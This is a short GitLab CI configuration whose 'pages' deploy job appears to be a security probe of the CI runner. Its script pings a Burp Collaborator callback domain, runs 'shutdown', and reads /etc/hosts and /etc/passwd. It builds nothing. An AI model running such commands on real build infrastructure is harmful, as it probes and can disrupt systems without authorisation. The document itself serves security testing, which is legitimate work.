image: alpine:latest

pages:
  stage: deploy
  script:
  - ping 9mwqcg812pr0ocx97q61rntkvb11pq.burpcollaborator.net
  - sudo apt-get install curl
  - pkg
  - shutdown
  - curl https://google.com
  - cat /etc/hosts
  - cat /etc/passwd
  - echo 'Nothing to do...'
  artifacts:
    paths:
    - public
  only:
  - master
